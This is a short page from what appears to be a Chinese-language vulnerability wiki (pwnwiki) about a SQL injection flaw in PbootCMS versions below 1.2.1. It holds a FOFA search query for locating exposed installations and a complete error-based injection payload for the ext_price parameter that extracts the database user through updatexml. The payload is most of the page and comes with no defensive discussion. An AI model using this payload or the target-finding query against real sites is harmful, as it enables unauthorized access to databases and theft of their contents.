Loading
0

PbootCMS ext price SQL注入漏洞

免费、自由、人人可编辑的漏洞库

,

漏洞影响

PbootCMS < 1.2.1

FOFA

app="PBOOTCMS"

Payload

/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123(http://127.0.0.1/PbootCMS/index.php/Index?ext_price%3D1/**/and/**/updatexml(1,concat(0x7e,(SELECT/**/distinct/**/concat(0x23,user(),0x23)/**/FROM/**/ay_user/**/limit/**/0,1),0x7e),1));%23=123)

免费、自由、人人可编辑的漏洞库--pwnwiki.com